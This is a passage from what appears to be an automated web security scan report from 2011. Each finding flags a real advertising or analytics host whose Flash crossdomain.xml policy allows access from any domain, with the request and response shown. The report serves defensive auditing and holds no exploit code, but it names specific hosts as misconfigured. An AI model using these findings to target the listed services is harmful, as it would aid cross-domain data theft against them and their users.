<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

4.10. http://altfarm.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1158796163000"
Last-Modified: Wed, 20 Sep 2006 23:49:23 GMT
Content-Type: text/xml
Content-Length: 204
Date: Tue, 06 Sep 2011 15:37:49 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.11. http://at.amgdgt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:51 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "308cb3d-12e-4871688bd9a00"
Accept-Ranges: bytes
Content-Length: 302
Cache-Control: max-age=21600
Expires: Tue, 06 Sep 2011 21:37:51 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

4.12. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 07 Sep 2011 14:56:57 GMT
Date: Tue, 06 Sep 2011 14:56:57 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.13. http://c.betrad.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Tue, 06 Sep 2011 14:59:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.14. http://c.brightcove.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Tue, 02 Aug 2011 23:56:42 UTC
Cache-Control: must-revalidate,max-age=0
Content-Type: application/xml
Content-Length: 387
Date: Tue, 06 Sep 2011 16:12:55 GMT
Connection: keep-alive
Server:

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.15. http://cache.specificmedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.specificmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:08 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n18 ( lax-agg-n43), ht-d lax-agg-n43.panthercdn.com
Cache-Control: max-age=604800
Expires: Fri, 09 Sep 2011 01:38:58 GMT
Age: 393610
Content-Length: 194
Content-Type: text/xml
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

4.16. http://cdn.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 15:00:41 GMT
ETag: "80b2ea66b4efcb1:0"
Server: Microsoft-IIS/7.5
X-Server: web103
Cache-Control: max-age=86400
Date: Tue, 06 Sep 2011 14:56:31 GMT
Content-Length: 355
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

4.17. http://cdn5.tribalfusion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn5.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn5.tribalfusion.com

Response

HTTP/1.0 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
Content-Length: 102
X-Reuse-Index: 18
Content-Type: text/xml
Date: Tue, 06 Sep 2011 14:59:04 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.18. http://clk.fetchback.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: clk.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:22 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

4.19. http://content.links.channelintelligence.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.links.channelintelligence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.links.channelintelligence.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 09 Nov 2007 15:45:10 GMT
ETag: "eb20ee82e722c81:2813"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:40 GMT
Content-Length: 206
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />    
</cross-domain-polic
...[SNIP]...

4.20. http://content.plymedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.plymedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.plymedia.com

Response

HTTP/1.0 200 OK
Cache-Control: public, max-age=25
Content-Type: text/xml; charset=utf-8
Expires: Tue, 06 Sep 2011 16:13:26 GMT
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:13:00 GMT
Content-Length: 682
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.21. http://core.insightexpressai.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: core.insightexpressai.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 02 Feb 2010 21:21:42 GMT
ETag: "0f7cfb64da4ca1:0"
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Tue, 06 Sep 2011 14:57:00 GMT
Content-Length: 139
Connection: close
Cache-Control: no-store

<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>

4.22. http://d.adroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.adroll.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 06 Sep 2011 15:32:14 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Wed, 24 Aug 2011 20:02:16 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.23. http://d.ads.readwriteweb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.ads.readwriteweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.ads.readwriteweb.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:46 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "49c238-c7-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.24. http://d1.openx.org/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:27 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "78412-c7-48f142a249100"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/xml
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.25. http://d7.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6034
Date: Tue, 06 Sep 2011 15:15:56 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.26. http://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 06 Sep 2011 00:24:57 GMT
Expires: Wed, 07 Sep 2011 00:24:57 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 60104

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.27. http://goku.brightcove.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://goku.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: goku.brightcove.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:13:00 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 14:35:23 GMT
Content-Length: 116
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
</cross-domain-policy>

4.28. http://gscounters.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gscounters.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:2b9b"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web202
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:56:33 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

4.29. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 07-Sep-2011 15:32:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-1; path=/; expires=Mon, 05-Sep-2016 15:32:16 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

4.30. http://img-cdn.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img-cdn.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/x-cross-domain-policy
Date: Tue, 06 Sep 2011 15:37:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.31. http://imp.fetchback.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:16 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

4.32. http://intelligence.marykay.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://intelligence.marykay.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: intelligence.marykay.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:51 GMT
Server: Omniture DC/2.0.0
xserver: www28
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.33. http://js.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Tue, 06 Sep 2011 16:45:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.34. http://l.betrad.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.betrad.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=315360000, public
Content-Type: application/xml
Date: Tue, 06 Sep 2011 14:59:07 GMT
ETag: "4ded34bc=cf"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Last-Modified: Mon, 06 Jun 2011 20:12:44 GMT
Server: Cherokee
Content-Length: 207
Connection: Close

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-p
...[SNIP]...

4.35. http://load.tubemogul.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://load.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: load.tubemogul.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1315229954000"
Last-Modified: Mon, 05 Sep 2011 13:39:14 GMT
host: rcv-srv33
Content-Type: application/xml
Content-Length: 204
Date: Tue, 06 Sep 2011 16:13:01 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.36. http://log30.doubleverify.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:04:53 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.37. http://netsuite.tt.omtrdc.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://netsuite.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: netsuite.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Tue, 06 Sep 2011 15:32:28 GMT
Accept-Ranges: bytes
ETag: W/"201-1313024241000"
Connection: close
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

4.38. http://network.realmedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: network.realmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Tue, 31 Mar 2009 16:50:50 GMT
ETag: "18d11d-d0-4666d0056ce80"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0d45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 15:35:10 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.39. http://now.eloqua.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 06 Sep 2011 15:32:12 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.40. http://oimg.m.cnbc.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oimg.m.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
